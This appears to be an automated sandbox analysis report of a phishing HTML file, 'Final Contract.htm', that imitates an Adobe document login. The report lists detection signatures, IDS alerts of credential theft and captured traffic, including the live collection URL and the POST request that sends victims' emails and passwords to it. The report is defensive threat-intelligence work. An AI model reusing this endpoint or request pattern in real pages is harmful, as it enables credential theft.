Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Final Contract.htm

Overview

General Information

Sample name:Final Contract.htm
Analysis ID:1620402
MD5:dc32622e2c5c707092e455cd5c265232
SHA1:15df085fe5315207843ed47ecf54b2d25e733ed5
SHA256:038e29831b56f5910206b6dd157cbdfbda80c9c30d5f5cb395a5c01d0502f91a
Infos:

Detection

HTMLPhisher
Score:76
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
AI detected suspicious Javascript
HTML file submission containing password form
Suspicious Javascript code found in HTML file
Detected hidden input values containing email addresses (often used in phishing pages)
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Invalid T&C link found
JA3 SSL client fingerprint seen in connection with other malware
None HTTPS page querying sensitive user data (password, username or email)
Suricata IDS alerts with low severity for network traffic

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 5328 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Final Contract.htm" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 3580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 --field-trial-handle=2216,i,4583716381143380160,5174444017956621571,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Final Contract.htmJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

    HTML

    SourceRuleDescriptionAuthorStrings
    1.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

        Sigma Signatures

        No Sigma rule has matched

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-02-20T23:21:29.333054+010020250051Successful Credential Theft Detected66.206.36.128443192.168.2.649927TCP
        2025-02-20T23:21:41.428068+010020250051Successful Credential Theft Detected66.206.36.128443192.168.2.650003TCP
        2025-02-20T23:21:50.210386+010020250051Successful Credential Theft Detected66.206.36.128443192.168.2.650008TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-02-20T23:21:29.332838+010020315661Successful Credential Theft Detected192.168.2.64992766.206.36.128443TCP
        2025-02-20T23:21:41.427532+010020315661Successful Credential Theft Detected192.168.2.65000366.206.36.128443TCP
        2025-02-20T23:21:50.209633+010020315661Successful Credential Theft Detected192.168.2.65000866.206.36.128443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-02-20T23:21:29.332838+010028122371Successful Credential Theft Detected192.168.2.64992766.206.36.128443TCP
        2025-02-20T23:21:41.427532+010028122371Successful Credential Theft Detected192.168.2.65000366.206.36.128443TCP
        2025-02-20T23:21:50.209633+010028122371Successful Credential Theft Detected192.168.2.65000866.206.36.128443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        Phishing

        barindex
        AI detected phishing page
        Source: file:///C:/Users/user/Desktop/Final%20Contract.htmJoe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 1.0.pages.csv
        Source: file:///C:/Users/user/Desktop/Final%20Contract.htmJoe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 1.1.pages.csv
        Yara detected HtmlPhish10
        Source: Yara matchFile source: Final Contract.htm, type: SAMPLE
        Source: Yara matchFile source: 1.1.pages.csv, type: HTML
        Source: Yara matchFile source: 1.0.pages.csv, type: HTML
        AI detected suspicious Javascript
        Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/Final%20Contract... This script demonstrates several high-risk behaviors, including data exfiltration, dynamic code execution, and the use of obfuscated URLs. The script collects user email and password credentials and sends them to a suspicious third-party domain, which is a clear indication of malicious intent. Additionally, the script attempts to redirect the user to a different domain after a certain number of failed login attempts, further suggesting phishing or other malicious activities. Overall, this script poses a significant security risk and should be treated with caution.
        Suspicious Javascript code found in HTML file
        Source: Final Contract.htmHTTP Parser: location.href
        Source: Final Contract.htmHTTP Parser: .location
        Source: Final Contract.htmHTTP Parser: .location
        Source: file:///C:/Users/user/Desktop/Final%20Contract.htmHTTP Parser: sj6f1k@nxl.co
        Source: Final Contract.htmHTTP Parser: Number of links: 0
        Source: file:///C:/Users/user/Desktop/Final%20Contract.htmHTTP Parser: Number of links: 0
        Source: Final Contract.htmHTTP Parser: <input type="password" .../> found but no <form action="...
        Source: file:///C:/Users/user/Desktop/Final%20Contract.htmHTTP Parser: <input type="password" .../> found but no <form action="...
        Source: Final Contract.htmHTTP Parser: Title: Adobe Secured File does not match URL
        Source: file:///C:/Users/user/Desktop/Final%20Contract.htmHTTP Parser: Title: Adobe Secured File does not match URL
        Source: Final Contract.htmHTTP Parser: Invalid link: Privacy & Cookies
        Source: file:///C:/Users/user/Desktop/Final%20Contract.htmHTTP Parser: Invalid link: Privacy & Cookies
        Source: file:///C:/Users/user/Desktop/Final%20Contract.htmHTTP Parser: Invalid link: Privacy & Cookies
        Source: file:///C:/Users/user/Desktop/Final%20Contract.htmHTTP Parser: Has password / email / username input fields
        Source: Final Contract.htmHTTP Parser: <input type="password" .../> found
        Source: file:///C:/Users/user/Desktop/Final%20Contract.htmHTTP Parser: <input type="password" .../> found
        Source: Final Contract.htmHTTP Parser: No favicon
        Source: file:///C:/Users/user/Desktop/Final%20Contract.htmHTTP Parser: No favicon
        Source: file:///C:/Users/user/Desktop/Final%20Contract.htmHTTP Parser: No favicon
        Source: Final Contract.htmHTTP Parser: No <meta name="author".. found
        Source: file:///C:/Users/user/Desktop/Final%20Contract.htmHTTP Parser: No <meta name="author".. found
        Source: file:///C:/Users/user/Desktop/Final%20Contract.htmHTTP Parser: No <meta name="author".. found
        Source: Final Contract.htmHTTP Parser: No <meta name="copyright".. found
        Source: file:///C:/Users/user/Desktop/Final%20Contract.htmHTTP Parser: No <meta name="copyright".. found
        Source: file:///C:/Users/user/Desktop/Final%20Contract.htmHTTP Parser: No <meta name="copyright".. found
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49709 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49822 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49946 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50009 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50012 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50014 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50015 version: TLS 1.2

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2031566 - Severity 1 - ET PHISHING Terse POST to Wordpress Folder - Probable Successful Phishing : 192.168.2.6:49927 -> 66.206.36.128:443
        Source: Network trafficSuricata IDS: 2031566 - Severity 1 - ET PHISHING Terse POST to Wordpress Folder - Probable Successful Phishing : 192.168.2.6:50008 -> 66.206.36.128:443
        Source: Network trafficSuricata IDS: 2031566 - Severity 1 - ET PHISHING Terse POST to Wordpress Folder - Probable Successful Phishing : 192.168.2.6:50003 -> 66.206.36.128:443
        Source: global trafficTCP traffic: 192.168.2.6:49968 -> 1.1.1.1:53
        Source: Joe Sandbox ViewIP Address: 199.232.192.193 199.232.192.193
        Source: Joe Sandbox ViewIP Address: 199.232.196.193 199.232.196.193
        Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
        Source: Joe Sandbox ViewASN Name: TURNKEY-INTERNETUS TURNKEY-INTERNETUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Network trafficSuricata IDS: 2812237 - Severity 1 - ETPRO PHISHING Possible Successful Generic Phish July 28 : 192.168.2.6:49927 -> 66.206.36.128:443
        Source: Network trafficSuricata IDS: 2812237 - Severity 1 - ETPRO PHISHING Possible Successful Generic Phish July 28 : 192.168.2.6:50008 -> 66.206.36.128:443
        Source: Network trafficSuricata IDS: 2812237 - Severity 1 - ETPRO PHISHING Possible Successful Generic Phish July 28 : 192.168.2.6:50003 -> 66.206.36.128:443
        Source: Network trafficSuricata IDS: 2025005 - Severity 1 - ET PHISHING Possible Successful Generic Phish Jan 14 2016 : 66.206.36.128:443 -> 192.168.2.6:49927
        Source: Network trafficSuricata IDS: 2025005 - Severity 1 - ET PHISHING Possible Successful Generic Phish Jan 14 2016 : 66.206.36.128:443 -> 192.168.2.6:50003
        Source: Network trafficSuricata IDS: 2025005 - Severity 1 - ET PHISHING Possible Successful Generic Phish Jan 14 2016 : 66.206.36.128:443 -> 192.168.2.6:50008
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /gOkYzuw.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /gOkYzuw.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficDNS traffic detected: DNS query: i.imgur.com
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: airtekincheatingandcooling.com
        Source: unknownHTTP traffic detected: POST /wp-induc/adobe.php HTTP/1.1Host: airtekincheatingandcooling.comConnection: keep-aliveContent-Length: 59sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: */*Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: Final Contract.htmString found in binary or memory: https://airtekincheatingandcooling.com/wp-induc/adobe.php
        Source: Final Contract.htmString found in binary or memory: https://i.imgur.com/gOkYzuw.png
        Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
        Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
        Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49709 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49822 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49946 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50009 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50012 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50014 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50015 version: TLS 1.2
        Source: classification engineClassification label: mal76.phis.winHTM@26/3@8/7
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Final Contract.htm"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 --field-trial-handle=2216,i,4583716381143380160,5174444017956621571,262144 /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 --field-trial-handle=2216,i,4583716381143380160,5174444017956621571,262144 /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior

        Stealing of Sensitive Information

        barindex
        HTML file submission containing password form
        Source: file:///C:/Users/user/Desktop/Final%20Contract.htmHTTP Parser: file:///C:/Users/user/Desktop/Final%20Contract.htm

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        Browser Extensions        		1
        Process Injection        		2
        Masquerading        		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Process Injection        		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
        Non-Application Layer Protocol        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
        Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
        Ingress Tool Transfer        		Traffic DuplicationData Destruction

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.